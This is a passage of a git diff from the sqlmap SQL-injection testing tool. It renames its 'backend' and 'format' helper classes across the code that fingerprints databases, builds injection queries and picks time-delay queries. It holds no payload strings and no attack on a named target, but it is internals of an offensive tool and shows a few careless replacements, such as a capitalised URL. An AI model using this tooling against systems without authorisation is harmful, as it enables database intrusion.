diff --git a/extra/gprof2dot/gprof2dot.py b/extra/gprof2dot/gprof2dot.py
index b9571473b..8978b8e93 100755
--- a/extra/gprof2dot/gprof2dot.py
+++ b/extra/gprof2dot/gprof2dot.py
@@ -1036,7 +1036,7 @@ class CallgrindParser(LineParser):
"""Parser for valgrind's callgrind tool.
See also:
- - http://valgrind.org/docs/manual/cl-format.html
+ - http://valgrind.org/docs/manual/cl-Format.html
"""
_call_re = re.compile('^calls=\s*(\d+)\s+((\d+|\+\d+|-\d+|\*)\s+)+$')
diff --git a/extra/xdot/xdot.py b/extra/xdot/xdot.py
index 42bc060cb..4bc94640e 100644
--- a/extra/xdot/xdot.py
+++ b/extra/xdot/xdot.py
@@ -16,7 +16,7 @@
# along with this program. If not, see .
#
-'''Visualize dot graphs via the xdot format.'''
+'''Visualize dot graphs via the xdot Format.'''
__author__ = "Jose Fonseca"
diff --git a/lib/controller/action.py b/lib/controller/action.py
index 8989f6929..597fff194 100644
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.controller.handler import setHandler
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import dataToStdout
from lib.core.data import conf
from lib.core.data import kb
@@ -31,8 +31,8 @@ def action():
# system to be able to go ahead with the injection
setHandler()
- if not backend.getDbms() or not conf.dbmsHandler:
- htmlParsed = format.getErrorParsedDBMSes()
+ if not Backend.getDbms() or not conf.dbmsHandler:
+ htmlParsed = Format.getErrorParsedDBMSes()
errMsg = "sqlmap was not able to fingerprint the "
errMsg += "back-end database management system"
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 60fc7bd49..793ef8166 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -13,11 +13,11 @@ import time
from lib.core.agent import agent
from lib.core.common import aliasToDbmsEnum
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import beep
from lib.core.common import extractRegexResult
from lib.core.common import findDynamicContent
-from lib.core.common import format
+from lib.core.common import Format
from lib.core.common import getComparePageRatio
from lib.core.common import getCompiledRegex
from lib.core.common import getSortedInjectionTests
@@ -140,19 +140,19 @@ def checkSqlInjection(place, parameter, value):
continue
- if len(backend.getErrorParsedDBMSes()) > 0 and dbms not in backend.getErrorParsedDBMSes() and kb.skipOthersDbms is None:
+ if len(Backend.getErrorParsedDBMSes()) > 0 and dbms not in Backend.getErrorParsedDBMSes() and kb.skipOthersDbms is None:
msg = "parsed error message(s) showed that the "
- msg += "back-end DBMS could be %s. " % format.getErrorParsedDBMSes()
+ msg += "back-end DBMS could be %s. " % Format.getErrorParsedDBMSes()
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
if conf.realTest or readInput(msg, default="Y") in ("y", "Y"):
- kb.skipOthersDbms = backend.getErrorParsedDBMSes()
+ kb.skipOthersDbms = Backend.getErrorParsedDBMSes()
if kb.skipOthersDbms and dbms not in kb.skipOthersDbms:
debugMsg = "skipping test '%s' because " % title
debugMsg += "the parsed error message(s) showed "
debugMsg += "that the back-end DBMS could be "
- debugMsg += "%s" % format.getErrorParsedDBMSes()
+ debugMsg += "%s" % Format.getErrorParsedDBMSes()
logger.debug(debugMsg)
continue
@@ -350,7 +350,7 @@ def checkSqlInjection(place, parameter, value):
# Force back-end DBMS according to the current
# test value for proper payload unescaping
- backend.forceDbms(dbms)
+ Backend.forceDbms(dbms)
# Skip test if the user provided custom column
# range and this is not a custom UNION test
@@ -362,7 +362,7 @@ def checkSqlInjection(place, parameter, value):
configUnion(test.request.char, test.request.columns)
- if not backend.getIdentifiedDbms():
+ if not Backend.getIdentifiedDbms():
warnMsg = "using unescaped version of the test "
warnMsg += "because of zero knowledge of the "
warnMsg += "back-end DBMS"
@@ -382,7 +382,7 @@ def checkSqlInjection(place, parameter, value):
where = vector[6]
# Reset forced back-end DBMS value
- backend.flushForcedDbms()
+ Backend.flushForcedDbms()
# If the injection test was successful feed the injection
# object with the test's details
@@ -421,11 +421,11 @@ def checkSqlInjection(place, parameter, value):
if hasattr(test, "details"):
for dKey, dValue in test.details.items():
if dKey == "dbms":
- injection.dbms = backend.setDbms(dValue)
+ injection.dbms = Backend.setDbms(dValue)
elif dKey == "dbms_version" and injection.dbms_version is None:
- injection.dbms_version = backend.setVersion(dValue)
+ injection.dbms_version = Backend.setVersion(dValue)
elif dKey == "os" and injection.os is None:
- injection.os = backend.setOs(dValue)
+ injection.os = Backend.setOs(dValue)
if conf.beep or conf.realTest:
beep()
@@ -488,7 +488,7 @@ def heuristicCheckSqlInjection(place, parameter):
infoMsg += "parameter '%s' might " % parameter
if result:
- infoMsg += "be injectable (possible DBMS: %s)" % (format.getErrorParsedDBMSes() or UNKNOWN_DBMS_VERSION)
+ infoMsg += "be injectable (possible DBMS: %s)" % (Format.getErrorParsedDBMSes() or UNKNOWN_DBMS_VERSION)
logger.info(infoMsg)
else:
infoMsg += "not be injectable"
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 5ff5bb68b..e4ee8a5af 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -7,7 +7,7 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.data import conf
@@ -63,11 +63,11 @@ def setHandler():
( SYBASE_ALIASES, SybaseMap, SybaseConn ),
]
- if backend.getIdentifiedDbms() is not None:
+ if Backend.getIdentifiedDbms() is not None:
for i in xrange(len(dbmsObj)):
dbmsAliases, _, _ = dbmsObj[i]
- if backend.getIdentifiedDbms().lower() in dbmsAliases:
+ if Backend.getIdentifiedDbms().lower() in dbmsAliases:
if i > 0:
pushValue(dbmsObj[i])
dbmsObj.remove(dbmsObj[i])
@@ -102,4 +102,4 @@ def setHandler():
# At this point back-end DBMS is correctly fingerprinted, no need
# to enforce it anymore
- backend.flushForcedDbms()
+ Backend.flushForcedDbms()
diff --git a/lib/core/agent.py b/lib/core/agent.py
index e64d7c7f4..9fa48e8aa 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -11,7 +11,7 @@ import re
from xml.etree import ElementTree as ET
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getCompiledRegex
from lib.core.common import isDBMSVersionAtLeast
from lib.core.common import isTechniqueAvailable
@@ -222,8 +222,8 @@ class Agent:
payload = payload.replace("[ORIGVALUE]", origvalue)
if "[INFERENCE]" in payload:
- if backend.getIdentifiedDbms() is not None:
- inference = queries[backend.getIdentifiedDbms()].inference
+ if Backend.getIdentifiedDbms() is not None:
+ inference = queries[Backend.getIdentifiedDbms()].inference
if "dbms_version" in inference:
if isDBMSVersionAtLeast(inference.dbms_version):
@@ -281,17 +281,17 @@ class Agent:
# SQLite version 2 does not support neither CAST() nor IFNULL(),
# introduced only in SQLite version 3
- if backend.getIdentifiedDbms() == DBMS.SQLITE:
+ if Backend.getIdentifiedDbms() == DBMS.SQLITE:
return field
if field.startswith("(CASE"):
nulledCastedField = field
else:
- nulledCastedField = queries[backend.getIdentifiedDbms()].cast.query % field
- if backend.getIdentifiedDbms() == DBMS.ACCESS:
- nulledCastedField = queries[backend.getIdentifiedDbms()].isnull.query % (nulledCastedField, nulledCastedField)
+ nulledCastedField = queries[Backend.getIdentifiedDbms()].cast.query % field
+ if Backend.getIdentifiedDbms() == DBMS.ACCESS:
+ nulledCastedField = queries[Backend.getIdentifiedDbms()].isnull.query % (nulledCastedField, nulledCastedField)
else:
- nulledCastedField = queries[backend.getIdentifiedDbms()].isnull.query % nulledCastedField
+ nulledCastedField = queries[Backend.getIdentifiedDbms()].isnull.query % nulledCastedField
return nulledCastedField
@@ -325,7 +325,7 @@ class Agent:
@rtype: C{str}
"""
- if not backend.getDbms():
+ if not Backend.getDbms():
return fields
if fields.startswith("(CASE"):
@@ -333,7 +333,7 @@ class Agent:
else:
fields = fields.replace(", ", ",")
fieldsSplitted = fields.split(",")
- dbmsDelimiter = queries[backend.getIdentifiedDbms()].delimiter.query
+ dbmsDelimiter = queries[Backend.getIdentifiedDbms()].delimiter.query
nulledCastedFields = []
for field in fieldsSplitted:
@@ -396,13 +396,13 @@ class Agent:
def simpleConcatQuery(self, query1, query2):
concatenatedQuery = ""
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
concatenatedQuery = "CONCAT(%s,%s)" % (query1, query2)
- elif backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
+ elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
concatenatedQuery = "%s||%s" % (query1, query2)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
concatenatedQuery = "%s+%s" % (query1, query2)
return concatenatedQuery
@@ -444,7 +444,7 @@ class Agent:
concatenatedQuery = query
fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, _, fieldsToCastStr, fieldsExists = self.getFields(query)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.misc.start, 1)
concatenatedQuery += ",'%s')" % kb.misc.stop
@@ -460,7 +460,7 @@ class Agent:
elif fieldsNoSelect:
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
- elif backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
+ elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.misc.start, 1)
concatenatedQuery += "||'%s'" % kb.misc.stop
@@ -476,7 +476,7 @@ class Agent:
elif fieldsNoSelect:
concatenatedQuery = "'%s'||%s||'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.misc.start, 1)
concatenatedQuery += "+'%s'" % kb.misc.stop
@@ -545,8 +545,8 @@ class Agent:
intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)]
- if backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
- inbandQuery = inbandQuery[:-len(FROM_TABLE[backend.getIdentifiedDbms()])]
+ if Backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
+ inbandQuery = inbandQuery[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]
for element in range(0, count):
if element > 0:
@@ -565,9 +565,9 @@ class Agent:
conditionIndex = query.index(" FROM ")
inbandQuery += query[conditionIndex:]
- if backend.getIdentifiedDbms() in FROM_TABLE:
+ if Backend.getIdentifiedDbms() in FROM_TABLE:
if " FROM " not in inbandQuery or "(CASE " in inbandQuery:
- inbandQuery += FROM_TABLE[backend.getIdentifiedDbms()]
+ inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
if intoRegExp:
inbandQuery += intoRegExp
@@ -584,8 +584,8 @@ class Agent:
else:
inbandQuery += char
- if backend.getIdentifiedDbms() in FROM_TABLE:
- inbandQuery += FROM_TABLE[backend.getIdentifiedDbms()]
+ if Backend.getIdentifiedDbms() in FROM_TABLE:
+ inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
@@ -614,21 +614,21 @@ class Agent:
"""
limitedQuery = query
- limitStr = queries[backend.getIdentifiedDbms()].limit.query
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query
fromIndex = limitedQuery.index(" FROM ")
untilFrom = limitedQuery[:fromIndex]
fromFrom = limitedQuery[fromIndex+1:]
orderBy = False
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
- limitStr = queries[backend.getIdentifiedDbms()].limit.query % (num, 1)
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
- limitStr = queries[backend.getIdentifiedDbms()].limit.query % (num+1, num+1)
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num+1, num+1)
limitedQuery += " %s" % limitStr
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
@@ -640,7 +640,7 @@ class Agent:
limitedQuery = limitedQuery % fromFrom
limitedQuery += "=%d" % (num + 1)
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
forgeNotIn = True
if " ORDER BY " in limitedQuery:
@@ -654,7 +654,7 @@ class Agent:
limitedQuery = limitedQuery.replace("DISTINCT %s" % notDistinct, notDistinct)
if limitedQuery.startswith("SELECT TOP ") or limitedQuery.startswith("TOP "):
- topNums = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, limitedQuery, re.I)
+ topNums = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, limitedQuery, re.I)
if topNums:
topNums = topNums.groups()
@@ -700,8 +700,8 @@ class Agent:
@rtype: C{str}
"""
- if backend.getIdentifiedDbms() is not None and hasattr(queries[backend.getIdentifiedDbms()], "case"):
- return queries[backend.getIdentifiedDbms()].case.query % expression
+ if Backend.getIdentifiedDbms() is not None and hasattr(queries[Backend.getIdentifiedDbms()], "case"):
+ return queries[Backend.getIdentifiedDbms()].case.query % expression
else:
return expression
diff --git a/lib/core/common.py b/lib/core/common.py
index 27987118b..ea80be9e7 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -127,6 +127,279 @@ class DynamicContentItem:
self.lineContentBefore = lineContentBefore
self.lineContentAfter = lineContentAfter
+class Format:
+ @staticmethod
+ def humanize(values, chain=" or "):
+ strJoin = "|".join([v for v in values])
+
+ return strJoin.replace("|", chain)
+
+ # Get methods
+ @staticmethod
+ def getDbms(versions=None):
+ """
+ Format the back-end DBMS fingerprint value and return its
+ values formatted as a human readable string.
+
+ @return: detected back-end DBMS based upon fingerprint techniques.
+ @rtype: C{str}
+ """
+
+ if versions is None and Backend.getVersionList():
+ versions = Backend.getVersionList()
+
+ if versions is None:
+ return Backend.getDbms()
+ else:
+ return "%s %s" % (Backend.getDbms(), " and ".join([v for v in versions]))
+
+ @staticmethod
+ def getErrorParsedDBMSes():
+ """
+ Parses the knowledge base htmlFp list and return its values
+ formatted as a human readable string.
+
+ @return: list of possible back-end DBMS based upon error messages
+ parsing.
+ @rtype: C{str}
+ """
+
+ htmlParsed = ""
+
+ if len(kb.htmlFp) == 0:
+ return None
+ elif len(kb.htmlFp) == 1:
+ htmlParsed = kb.htmlFp[0]
+ elif len(kb.htmlFp) > 1:
+ htmlParsed = " or ".join([htmlFp for htmlFp in kb.htmlFp])
+
+ return htmlParsed
+
+ @staticmethod
+ def getOs(target, info):
+ """
+ Formats the back-end operating system fingerprint value
+ and return its values formatted as a human readable string.
+
+ Example of info (kb.headersFp) dictionary:
+
+ {
+ 'distrib': set(['Ubuntu']),
+ 'type': set(['Linux']),
+ 'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),
+ 'release': set(['8.10'])
+ }
+
+ Example of info (kb.bannerFp) dictionary:
+
+ {
+ 'sp': set(['Service Pack 4']),
+ 'dbmsVersion': '8.00.194',
+ 'dbmsServicePack': '0',
+ 'distrib': set(['2000']),
+ 'dbmsRelease': '2000',
+ 'type': set(['Windows'])
+ }
+
+ @return: detected back-end operating system based upon fingerprint
+ techniques.
+ @rtype: C{str}
+ """
+
+ infoStr = ""
+
+ if info and "type" in info:
+ infoStr += "%s operating system: %s" % (target, Format.humanize(info["type"]))
+
+ if "distrib" in info:
+ infoStr += " %s" % Format.humanize(info["distrib"])
+
+ if "release" in info:
+ infoStr += " %s" % Format.humanize(info["release"])
+
+ if "sp" in info:
+ infoStr += " %s" % Format.humanize(info["sp"])
+
+ if "codename" in info:
+ infoStr += " (%s)" % Format.humanize(info["codename"])
+
+ if "technology" in info:
+ infoStr += "\nweb application technology: %s" % Format.humanize(info["technology"], ", ")
+
+ return infoStr
+
+class Backend:
+ # Set methods
+ @staticmethod
+ def setDbms(dbms):
+ dbms = aliasToDbmsEnum(dbms)
+
+ if dbms is None:
+ return None
+
+ # Little precaution, in theory this condition should always be false
+ elif kb.dbms is not None and kb.dbms != dbms:
+ msg = "sqlmap previously fingerprinted back-end DBMS "
+ msg += "%s. However now it has been fingerprinted " % kb.dbms
+ msg += "to be %s. " % dbms
+ msg += "Please, specify which DBMS is "
+ msg += "correct [%s (default)/%s] " % (kb.dbms, dbms)
+
+ while True:
+ inp = readInput(msg, default=kb.dbms)
+
+ if aliasToDbmsEnum(inp) == kb.dbms:
+ break
+ elif aliasToDbmsEnum(inp) == dbms:
+ kb.dbms = aliasToDbmsEnum(inp)
+ break
+ else:
+ warnMsg = "invalid value"
+ logger.warn(warnMsg)
+
+ elif kb.dbms is None:
+ kb.dbms = aliasToDbmsEnum(dbms)
+
+ return kb.dbms
+
+ @staticmethod
+ def setVersion(version):
+ if isinstance(version, basestring):
+ kb.dbmsVersion = [ version ]
+
+ return kb.dbmsVersion
+
+ @staticmethod
+ def setVersionList(versionsList):
+ if isinstance(versionsList, list):
+ kb.dbmsVersion = versionsList
+ elif isinstance(version, basestring):
+ Backend.setVersion(versionsList)
+ else:
+ logger.error("invalid format of versionsList")
+
+ @staticmethod
+ def forceDbms(dbms):
+ kb.misc.forcedDbms = aliasToDbmsEnum(dbms)
+
+ @staticmethod
+ def flushForcedDbms():
+ kb.misc.forcedDbms = None
+
+ @staticmethod
+ def setOs(os):
+ if os is None:
+ return None
+
+ # Little precaution, in theory this condition should always be false
+ elif kb.os is not None and kb.os != os:
+ msg = "sqlmap previously fingerprinted back-end DBMS "
+ msg += "operating system %s. However now it has " % kb.os
+ msg += "been fingerprinted to be %s. " % os
+ msg += "Please, specify which OS is "
+ msg += "correct [%s (default)/%s] " % (kb.os, os)
+
+ while True:
+ inp = readInput(msg, default=kb.os)
+
+ if inp == kb.os:
+ break
+ elif inp == os:
+ kb.os = inp
+ break
+ else:
+ warnMsg = "invalid value"
+ logger.warn(warnMsg)
+
+ elif kb.os is None:
+ kb.os = os
+
+ return kb.os
+
+ # Get methods
+ @staticmethod
+ def getForcedDbms():
+ return aliasToDbmsEnum(kb.misc.forcedDbms)
+
+ @staticmethod
+ def getDbms():
+ return aliasToDbmsEnum(kb.dbms)
+
+ @staticmethod
+ def getErrorParsedDBMSes():
+ """
+ Returns array with parsed DBMS names till now
+
+ This functions is called to:
+
+ 1. Sort the tests, getSortedInjectionTests() - detection phase.
+ 2. Ask user whether or not skip specific DBMS tests in detection phase,
+ lib/controller/checks.py - detection phase.
+ 3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
+ fingerprint phase.
+ """
+
+ return kb.htmlFp
+
+ @staticmethod
+ def getIdentifiedDbms():
+ dbms = None
+
+ if Backend.getForcedDbms() is not None:
+ dbms = Backend.getForcedDbms()
+ elif Backend.getDbms() is not None:
+ dbms = kb.dbms
+ elif conf.dbms is not None:
+ dbms = conf.dbms
+ elif len(Backend.getErrorParsedDBMSes()) > 0:
+ dbms = Backend.getErrorParsedDBMSes()[0]
+
+ return aliasToDbmsEnum(dbms)
+
+ @staticmethod
+ def getVersion():
+ if len(kb.dbmsVersion) > 0:
+ return kb.dbmsVersion[0]
+ else:
+ return None
+
+ @staticmethod
+ def getVersionList():
+ if len(kb.dbmsVersion) > 0:
+ return kb.dbmsVersion
+ else:
+ return None
+
+ # Comparison methods
+ @staticmethod
+ def isDbms(dbms):
+ return Backend.getDbms() is not None and Backend.getDbms() == aliasToDbmsEnum(dbms)
+
+ @staticmethod
+ def isDbmsWithin(aliases):
+ return Backend.getDbms() is not None and Backend.getDbms().lower() in aliases
+
+ @staticmethod
+ def isVersion(version):
+ return Backend.getVersion() is not None and Backend.getVersion() == version
+
+ @staticmethod
+ def isVersionWithin(versionList):
+ if Backend.getVersionList() is None:
+ return False
+
+ for dbmsVersion in Backend.getVersionList():
+ if dbmsVersion == UNKNOWN_DBMS_VERSION:
+ continue
+ elif dbmsVersion in versionList:
+ return True
+
+ return False
+
+ @staticmethod
+ def isVersionGreaterOrEqualThan(version):
+ return Backend.getVersion() is not None and str(Backend.getVersion()) >= str(version)
+
def paramToDict(place, parameters=None):
"""
Split the parameters into names and values, check if these parameters
@@ -512,14 +785,14 @@ def parsePasswordHash(password):
if not password or password == " ":
password = "NULL"
- if backend.getIdentifiedDbms() == DBMS.MSSQL and password != "NULL" and isHexEncodedString(password):
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL and password != "NULL" and isHexEncodedString(password):
hexPassword = password
password = "%s\n" % hexPassword
password += "%sheader: %s\n" % (blank, hexPassword[:6])
password += "%ssalt: %s\n" % (blank, hexPassword[6:14])
password += "%smixedcase: %s\n" % (blank, hexPassword[14:54])
- if not backend.isVersionWithin(("2005", "2008")):
+ if not Backend.isVersionWithin(("2005", "2008")):
password += "%suppercase: %s" % (blank, hexPassword[54:])
return password
@@ -817,25 +1090,25 @@ def parseUnionPage(output, expression, partial=False, condition=None, sort=True)
def getDelayQuery(andCond=False):
query = None
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if not kb.data.banner:
conf.dbmsHandler.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
- if banVer is None or (backend.getIdentifiedDbms() == DBMS.MYSQL and banVer >= "5.0.12") or (backend.getIdentifiedDbms() == DBMS.PGSQL and banVer >= "8.2"):
- query = queries[backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
+ if banVer is None or (Backend.getIdentifiedDbms() == DBMS.MYSQL and banVer >= "5.0.12") or (Backend.getIdentifiedDbms() == DBMS.PGSQL and banVer >= "8.2"):
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
else:
- query = queries[backend.getIdentifiedDbms()].timedelay.query2 % conf.timeSec
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
- query = queries[backend.getIdentifiedDbms()].timedelay.query
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query2 % conf.timeSec
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query
else:
- query = queries[backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
+ query = queries[Backend.getIdentifiedDbms()].timedelay.query % conf.timeSec
if andCond:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.SQLITE ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.SQLITE ):
query = query.replace("SELECT ", "")
- elif backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
query = "(%s)>0" % query
return query
@@ -1791,8 +2064,8 @@ def isDBMSVersionAtLeast(version):
retVal = None
- if backend.getVersion() and backend.getVersion() != UNKNOWN_DBMS_VERSION:
- value = backend.getVersion().replace(" ", "").rstrip('.')
+ if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION:
+ value = Backend.getVersion().replace(" ", "").rstrip('.')
while True:
index = value.find('.', value.find('.') + 1)
@@ -1910,14 +2183,14 @@ def getSortedInjectionTests():
retVal = SORTORDER.LAST
elif 'details' in test and 'dbms' in test.details:
- if test.details.dbms in backend.getErrorParsedDBMSes():
+ if test.details.dbms in Backend.getErrorParsedDBMSes():
retVal = SORTORDER.SECOND
else:
retVal = SORTORDER.THIRD
return retVal
- if backend.getErrorParsedDBMSes():
+ if Backend.getErrorParsedDBMSes():
retVal = sorted(retVal, key=priorityFunction)
return retVal
@@ -1955,279 +2228,6 @@ def unicodeToSafeHTMLValue(value):
return retVal
-class format:
- @staticmethod
- def humanize(values, chain=" or "):
- strJoin = "|".join([v for v in values])
-
- return strJoin.replace("|", chain)
-
- # Get methods
- @staticmethod
- def getDbms(versions=None):
- """
- Format the back-end DBMS fingerprint value and return its
- values formatted as a human readable string.
-
- @return: detected back-end DBMS based upon fingerprint techniques.
- @rtype: C{str}
- """
-
- if versions is None and backend.getVersionList():
- versions = backend.getVersionList()
-
- if versions is None:
- return backend.getDbms()
- else:
- return "%s %s" % (backend.getDbms(), " and ".join([v for v in versions]))
-
- @staticmethod
- def getErrorParsedDBMSes():
- """
- Parses the knowledge base htmlFp list and return its values
- formatted as a human readable string.
-
- @return: list of possible back-end DBMS based upon error messages
- parsing.
- @rtype: C{str}
- """
-
- htmlParsed = ""
-
- if len(kb.htmlFp) == 0:
- return None
- elif len(kb.htmlFp) == 1:
- htmlParsed = kb.htmlFp[0]
- elif len(kb.htmlFp) > 1:
- htmlParsed = " or ".join([htmlFp for htmlFp in kb.htmlFp])
-
- return htmlParsed
-
- @staticmethod
- def getOs(target, info):
- """
- Formats the back-end operating system fingerprint value
- and return its values formatted as a human readable string.
-
- Example of info (kb.headersFp) dictionary:
-
- {
- 'distrib': set(['Ubuntu']),
- 'type': set(['Linux']),
- 'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),
- 'release': set(['8.10'])
- }
-
- Example of info (kb.bannerFp) dictionary:
-
- {
- 'sp': set(['Service Pack 4']),
- 'dbmsVersion': '8.00.194',
- 'dbmsServicePack': '0',
- 'distrib': set(['2000']),
- 'dbmsRelease': '2000',
- 'type': set(['Windows'])
- }
-
- @return: detected back-end operating system based upon fingerprint
- techniques.
- @rtype: C{str}
- """
-
- infoStr = ""
-
- if info and "type" in info:
- infoStr += "%s operating system: %s" % (target, format.humanize(info["type"]))
-
- if "distrib" in info:
- infoStr += " %s" % format.humanize(info["distrib"])
-
- if "release" in info:
- infoStr += " %s" % format.humanize(info["release"])
-
- if "sp" in info:
- infoStr += " %s" % format.humanize(info["sp"])
-
- if "codename" in info:
- infoStr += " (%s)" % format.humanize(info["codename"])
-
- if "technology" in info:
- infoStr += "\nweb application technology: %s" % format.humanize(info["technology"], ", ")
-
- return infoStr
-
-class backend:
- # Set methods
- @staticmethod
- def setDbms(dbms):
- dbms = aliasToDbmsEnum(dbms)
-
- if dbms is None:
- return None
-
- # Little precaution, in theory this condition should always be false
- elif kb.dbms is not None and kb.dbms != dbms:
- msg = "sqlmap previously fingerprinted back-end DBMS "
- msg += "%s. However now it has been fingerprinted " % kb.dbms
- msg += "to be %s. " % dbms
- msg += "Please, specify which DBMS is "
- msg += "correct [%s (default)/%s] " % (kb.dbms, dbms)
-
- while True:
- inp = readInput(msg, default=kb.dbms)
-
- if aliasToDbmsEnum(inp) == kb.dbms:
- break
- elif aliasToDbmsEnum(inp) == dbms:
- kb.dbms = aliasToDbmsEnum(inp)
- break
- else:
- warnMsg = "invalid value"
- logger.warn(warnMsg)
-
- elif kb.dbms is None:
- kb.dbms = aliasToDbmsEnum(dbms)
-
- return kb.dbms
-
- @staticmethod
- def setVersion(version):
- if isinstance(version, basestring):
- kb.dbmsVersion = [ version ]
-
- return kb.dbmsVersion
-
- @staticmethod
- def setVersionList(versionsList):
- if isinstance(versionsList, list):
- kb.dbmsVersion = versionsList
- elif isinstance(version, basestring):
- backend.setVersion(versionsList)
- else:
- logger.error("invalid format of versionsList")
-
- @staticmethod
- def forceDbms(dbms):
- kb.misc.forcedDbms = aliasToDbmsEnum(dbms)
-
- @staticmethod
- def flushForcedDbms():
- kb.misc.forcedDbms = None
-
- @staticmethod
- def setOs(os):
- if os is None:
- return None
-
- # Little precaution, in theory this condition should always be false
- elif kb.os is not None and kb.os != os:
- msg = "sqlmap previously fingerprinted back-end DBMS "
- msg += "operating system %s. However now it has " % kb.os
- msg += "been fingerprinted to be %s. " % os
- msg += "Please, specify which OS is "
- msg += "correct [%s (default)/%s] " % (kb.os, os)
-
- while True:
- inp = readInput(msg, default=kb.os)
-
- if inp == kb.os:
- break
- elif inp == os:
- kb.os = inp
- break
- else:
- warnMsg = "invalid value"
- logger.warn(warnMsg)
-
- elif kb.os is None:
- kb.os = os
-
- return kb.os
-
- # Get methods
- @staticmethod
- def getForcedDbms():
- return aliasToDbmsEnum(kb.misc.forcedDbms)
-
- @staticmethod
- def getDbms():
- return aliasToDbmsEnum(kb.dbms)
-
- @staticmethod
- def getErrorParsedDBMSes():
- """
- Returns array with parsed DBMS names till now
-
- This functions is called to:
-
- 1. Sort the tests, getSortedInjectionTests() - detection phase.
- 2. Ask user whether or not skip specific DBMS tests in detection phase,
- lib/controller/checks.py - detection phase.
